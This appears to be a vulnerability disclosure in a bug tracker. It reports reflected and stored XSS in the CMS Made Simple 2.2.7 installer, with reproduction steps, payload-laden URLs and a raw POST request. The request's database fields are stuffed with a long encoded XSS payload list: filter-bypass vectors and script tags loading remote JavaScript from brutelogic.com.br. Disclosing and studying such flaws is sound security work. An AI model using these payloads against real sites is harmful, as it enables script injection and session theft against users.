Summary:
multiple reflected and stored XSS's in 2.2.7 installation process
Detailed Description:
steps reproduce :
xss1:
http://127.0.0.1:7777/cmsms/cmsms-2.2.7-install.php/index.php/xxx?m92237b7a=4
1. browse the install.php
2.click next and next until you will reach db config
3. entered db name with xss payload like this " aaaa" onfocus="confirm(22)"
autofocus a=""
4 click next we can get an xss pop up
5. reamaing db fields also vulnerable to xss
xss2:
http://127.0.0.1:7777/cmsms/cmsms-2.2.7-install.php/index.phpcwd0n%3Cscript%3Ealert(1)%3C/script%3Eb08uu?m92237b7a=4
xss3:
POST
/cmsms/cmsms-2.2.7-install.php/index.php/ffeh5"><script>alert(1)</script>x3xm3?m92237b7a=4
HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://127.0.0.1:7777/cmsms/cmsms-2.2.7-install.php/index.php?m92237b7a=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 4557
Cookie: CMSICc9f3718640=fnsl6c172501mu8gpd92f3f7hq
Connection: close
Upgrade-Insecure-Requests: 1
dbhost=localhost+++%3Cobject+data%3Djavascript%3Aalert%281%29%3E++%3Ciframe+srcdoc%3D%3Csvg%2Fo%26%23x6Eload%26equals%3Balert%26lpar%3B1%29%26gt%3B%3E++%3Csvg%3E%3Cscript+xlink%3Ahref%3Ddata%3A%2Calert%281%29+%2F%3E++%3Cmath%3E%3Cbrute+xlink%3Ahref%3Djavascript%3Aalert%281%29%3Eclick++%3Csvg%3E%3Ca+xmlns%3Axlink%3Dhttp%3A%2F%2Fwww.w3.org%2F1999%2Fxlink+xlink%3Ahref%3D%3F%3E%3Ccircle+r%3D400+%2F%3E%3Canimate+attributeName%3Dxlink%3Ahref+begin%3D0+from%3Djavascript%3Aalert%281%29+to%3D%26%3E++Attack+vector+for+mobile+devices+%3Chtml+ontouchstart%3Dalert%281%29%3E++%3Chtml+ontouchend%3Dalert%281%29%3E++%3Chtml+ontouchmove%3Dalert%281%29%3E++%3Chtml+ontouchcancel%3Dalert%281%29%3E++%3Cbody+onorientationchange%3Dalert%281%29%3E++chrome+auditor+bypassed+%3Cscript+src%3D%22data%3A%26comma%3Balert%281%29%2F%2F++%22%3E%3Cscript+src%3Ddata%3A%26comma%3Balert%281%29%2F%2F++%3Cscript+src%3D%22%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%22%3E%3Cscript+src%3D%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%3Clink+rel%3Dimport+href%3D%22data%3Atext%2Fhtml%26comma%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%26sol%3Bscript%26gt%3B&dbname=12++r%3Cobject+data%3Djavascript%3Aalert%281%29%3E++%3Ciframe+srcdoc%3D%3Csvg%2Fo%26%23x6Eload%26equals%3Balert%26lpar%3B1%29%26gt%3B%3E++%3Csvg%3E%3Cscript+xlink%3Ahref%3Ddata%3A%2Calert%281%29+%2F%3E++%3Cmath%3E%3Cbrute+xlink%3Ahref%3Djavascript%3Aalert%281%29%3Eclick++%3Csvg%3E%3Ca+xmlns%3Axlink%3Dhttp%3A%2F%2Fwww.w3.org%2F1999%2Fxlink+xlink%3Ahref%3D%3F%3E%3Ccircle+r%3D400+%2F%3E%3Canimate+attributeName%3Dxlink%3Ahref+begin%3D0+from%3Djavascript%3Aalert%281%29+to%3D%26%3E++Attack+vector+for+mobile+devices+%3Chtml+ontouchstart%3Dalert%281%29%3E++%3Chtml+ontouchend%3Dalert%281%29%3E++%3Chtml+ontouchmove%3Dalert%281%29%3E++%3Chtml+ontouchcancel%3Dalert%281%29%3E++%3Cbody+onorientationchange%3Dalert%281%29%3E++chrome+auditor+bypassed+%3Cscript+src%3D%22data%3A%26comma%3Balert%281%29%2F%2F++%22%3E%3Cscript+src%3Ddata%3A%26comma%3Balert%281%29%2F%2F++%3Cscript+src%3D%22%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%22%3E%3Cscript+src%3D%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%3Clink+rel%3Dimport+href%3D%22data%3Atext%2Fhtml%26comma%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%26sol%3Bscript%26gt%3B&dbuser=%3Cobject+data%3Djavascript%3Aalert%281%29%3E++%3Ciframe+srcdoc%3D%3Csvg%2Fo%26%23x6Eload%26equals%3Balert%26lpar%3B1%29%26gt%3B%3E++%3Csvg%3E%3Cscript+xlink%3Ahref%3Ddata%3A%2Calert%281%29+%2F%3E++%3Cmath%3E%3Cbrute+xlink%3Ahref%3Djavascript%3Aalert%281%29%3Eclick++%3Csvg%3E%3Ca+xmlns%3Axlink%3Dhttp%3A%2F%2Fwww.w3.org%2F1999%2Fxlink+xlink%3Ahref%3D%3F%3E%3Ccircle+r%3D400+%2F%3E%3Canimate+attributeName%3Dxlink%3Ahref+begin%3D0+from%3Djavascript%3Aalert%281%29+to%3D%26%3E++Attack+vector+for+mobile+devices+%3Chtml+ontouchstart%3Dalert%281%29%3E++%3Chtml+ontouchend%3Dalert%281%29%3E++%3Chtml+ontouchmove%3Dalert%281%29%3E++%3Chtml+ontouchcancel%3Dalert%281%29%3E++%3Cbody+onorientationchange%3Dalert%281%29%3E++chrome+auditor+bypassed+%3Cscript+src%3D%22data%3A%26comma%3Balert%281%29%2F%2F++%22%3E%3Cscript+src%3Ddata%3A%26comma%3Balert%281%29%2F%2F++%3Cscript+src%3D%22%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%22%3E%3Cscript+src%3D%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%3Clink+rel%3Dimport+href%3D%22data%3Atext%2Fhtml%26comma%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%26sol%3Bscript%26gt%3B&dbpass=%3Cobject+data%3Djavascript%3Aalert%281%29%3E++%3Ciframe+srcdoc%3D%3Csvg%2Fo%26%23x6Eload%26equals%3Balert%26lpar%3B1%29%26gt%3B%3E++%3Csvg%3E%3Cscript+xlink%3Ahref%3Ddata%3A%2Calert%281%29+%2F%3E++%3Cmath%3E%3Cbrute+xlink%3Ahref%3Djavascript%3Aalert%281%29%3Eclick++%3Csvg%3E%3Ca+xmlns%3Axlink%3Dhttp%3A%2F%2Fwww.w3.org%2F1999%2Fxlink+xlink%3Ahref%3D%3F%3E%3Ccircle+r%3D400+%2F%3E%3Canimate+attributeName%3Dxlink%3Ahref+begin%3D0+from%3Djavascript%3Aalert%281%29+to%3D%26%3E++Attack+vector+for+mobile+devices+%3Chtml+ontouchstart%3Dalert%281%29%3E++%3Chtml+ontouchend%3Dalert%281%29%3E++%3Chtml+ontouchmove%3Dalert%281%29%3E++%3Chtml+ontouchcancel%3Dalert%281%29%3E++%3Cbody+onorientationchange%3Dalert%281%29%3E++chrome+auditor+bypassed+%3Cscript+src%3D%22data%3A%26comma%3Balert%281%29%2F%2F++%22%3E%3Cscript+src%3Ddata%3A%26comma%3Balert%281%29%2F%2F++%3Cscript+src%3D%22%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%22%3E%3Cscript+src%3D%2F%2Fbrutelogic.com.br%26sol%3B1.js%26num%3B++%3Clink+rel%3Dimport+href%3D%22data%3Atext%2Fhtml%26comma%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%26sol%3Bscript%26gt%3B&timezone=Europe%2FBerlin&next=Next+%E2%86%92